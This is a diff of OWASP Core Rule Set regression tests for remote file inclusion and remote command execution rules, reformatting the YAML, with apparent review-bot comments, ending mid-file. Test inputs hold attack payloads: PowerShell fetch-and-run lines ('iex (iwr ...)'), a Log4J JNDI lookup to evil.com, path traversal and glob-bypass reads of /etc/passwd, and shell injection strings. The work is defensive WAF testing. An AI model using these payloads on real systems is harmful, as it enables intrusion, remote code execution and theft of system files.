"/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 9 desc: Matching hosts stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com/" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 10 desc: Matching hosts and ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 11 desc: Subdomains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
- method: GET - port: 80 - uri: "/get?x=http://www.example.com/some/path" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://www.example.com/some/path" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 12 desc: Bypass 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:asd@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:asd@evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 13 desc: Bypass 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f@evil.com/" + version: HTTP/1.1 + 
output: + log_contains: id "931130" + - test_id: 14 desc: Bypass 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 15 desc: basic auth stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo:bar@example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo:bar@example.com/" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://foo.bar" - version: HTTP/1.1 - output: - 
log_contains: id "931130" - - test_title: 931130-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=gopher://google.com/_SSRFTest!" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=gopher://google.com/_SSRFTest!" 
+ version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ldap://127.0.0.1/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ldap://127.0.0.1/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 19 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=jar:http://evil.co/b.zip!a" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=jar:http://evil.co/b.zip!a" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://etc/services" - version: HTTP/1.1 - 
output: - log_contains: id "931130" - - test_title: 931130-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://etc/services" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=local_file://something" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=local_file://something" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file:///etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931130" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file:///etc/passwd" + version: HTTP/1.1 + output: + log_contains: id "931130" 
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 35e73e0eb..1685c4137 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -2,22 +2,19 @@ meta: author: "emphazer, azurit" description: None - enabled: true - name: 931131.yaml tests: - - test_title: 931131-1 + - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931131" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" + version: HTTP/1.1 + output: + log_contains: id "931131" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index f48d4fe29..c7b1c1167 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml 
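Review bot: The 931131 section is missing the top-level `rule_id` key that the 932120, 932125, 932130 and 932131 sections of this same patch insert between the `meta` block and `tests:`; if the new runner relies on that key to map a file to its rule, 931131.yaml becomes the odd one out. Adding `rule_id: 931131` before `tests:` would bring it in line. Separately, `description: None` is a plain scalar, so it is the four-character string "None" rather than a YAML null; if no description is intended, `null` or dropping the key says so unambiguously.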
@@ -1,87 +1,81 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "932120.yaml" description: "Tests to trigger or not trigger rule 932120" +rule_id: 932120 tests: - - test_title: 932120-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test 
agent" - Host: "localhost" - Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932120\"" - - test_title: 932120-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + no_log_contains: "id \"932120\"" + - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' - version: "HTTP/1.1" - output: - log_contains: id "932120" + - input: + 
dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' + version: "HTTP/1.1" + output: + log_contains: id "932120" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index a5df88d85..efd4198ee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml 
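Review bot: The cookie name in test 3, `Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1"`, carries rule id 931120 instead of this file's 932120; presumably the rule inspects the cookie value, so the test still passes, but the stale id misleads anyone grepping for a rule's test payloads. The same stale `931120-3` / `931120-4` cookie names reappear in tests 3 and 4 of the 932130 section below. Suggest `Cookie: "932120-3=Invoke-Expression%20-Command%20file.ps1"` here and `932130-3=<(cmd)` / `>(cmd)=932130-4` there. Also, `log_contains` is written as `"id \"932120\""` in tests 1–4 but as the plain scalar `id "932120"` in test 5; normalizing to one form, e.g. `'id "932120"'`, would make the file easier to scan.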
@@ -1,55 +1,51 @@ --- meta: author: "0xInfection" - enabled: true - name: "932125.yaml" description: "Tests to trigger rule 932125" +rule_id: 932125 tests: - - test_title: 932125-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log_contains: id "932125" + - test_id: 2 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" + version: "HTTP/1.1" + output: + log_contains: id "932125" + - test_id: 3 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: 
"OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) - version: "HTTP/1.1" - output: - log_contains: id "932125" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) + version: "HTTP/1.1" + output: + log_contains: id "932125" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index b5c8aa173..6cce5b313 100755 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml 
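Review bot: `data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)` in test 3 is the only unquoted `data` value in this section; it parses as a plain string today only because it contains no `: ` or ` #` sequence, and a later edit adding either would silently truncate or break the value. Quoting it, `data: 'cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)'`, matches the other payloads in this patch and removes the fragility.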
@@ -1,268 +1,251 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - enabled: true - name: "932130.yaml" description: "Tests to trigger or not trigger rule 932130" +rule_id: 932130 tests: - - test_title: 932130-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932130-1=$(cmd)" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-2=${cmd}" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "931120-3=<(cmd)" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: ">(cmd)=931120-4" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-5=Some text (in brackets)." - version: "HTTP/1.1" - output: - no_log_contains: 'id "932130"' - - test_title: 932130-6 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932130-1=$(cmd)" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-2=${cmd}" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "931120-3=<(cmd)" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 4 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: ">(cmd)=931120-4" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" 
+ data: "932130-5=Some text (in brackets)." + version: "HTTP/1.1" + output: + no_log_contains: 'id "932130"' + - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 7 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /etc/pa[s]swd - uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /etc/pa[s]swd + uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /[?]tc/pa[?]swd - uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-10 + - input: + dest_addr: 127.0.0.1 + 